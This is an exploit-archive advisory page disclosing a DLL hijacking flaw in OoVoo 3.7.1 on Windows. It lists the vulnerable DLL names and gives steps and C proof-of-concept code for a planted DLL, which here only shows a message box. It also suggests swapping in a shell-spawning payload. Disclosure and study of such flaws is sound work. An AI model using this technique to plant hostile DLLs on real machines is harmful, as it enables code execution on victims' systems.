what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

OoVoo 3.7.1 DLL Hijacking

OoVoo 3.7.1 DLL Hijacking
Posted Sep 9, 2016
Authored by Amir.ght

OoVoo version 3.7.1 suffers from a DLL hijacking vulnerability.

tags | exploit
systems | windows
SHA-256 | d4e01ddd8f90c9a3711633817c0164f1245d6e3664f1779e2da00e8226a3bc9c

OoVoo 3.7.1 DLL Hijacking

Change Mirror Download
# Exploit Title: OoVoo DLL Hijacking
# Author: Ashiyane Digital Security Team
# Vendor Homepage:http://www.oovoo.com/
# Version: 3.7.1
# Tested on:Windows 7
----------------------------------------------------------------------------------------------------------
vulnerable DLLs :
ext-ms-win-kernel32-package-current-l1-1-0.dll
api-ms-win-appmodel-runtime-l1-1-1.dll
api-ms-win-core-sysinfo-l1-2-1.dll
api-ms-win-core-localization-l1-2-1.dll
api-ms-win-core-fibers-l1-1-1.dll
api-ms-win-core-synch-l1-2-0.dll
ext-ms-win-kernel32-package-current-l1-1-0.dll

If an attacker can place the malicious dll with any names of above
series in same location
with Oovoo.exe where victim open Oovoo.exe it will load and run the
attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.

----------------------------------------------------------------------------------------------------------
# Exploit:
1- Save and compile below C code to create vuln DLL

2- Place vuln DLL on Same Directory of Oovoo.exe

3- Open Oovoo.exe

//gcc test.c -o shcore.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)

BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}

int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################
Discovered By : Amir.ght
#################

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close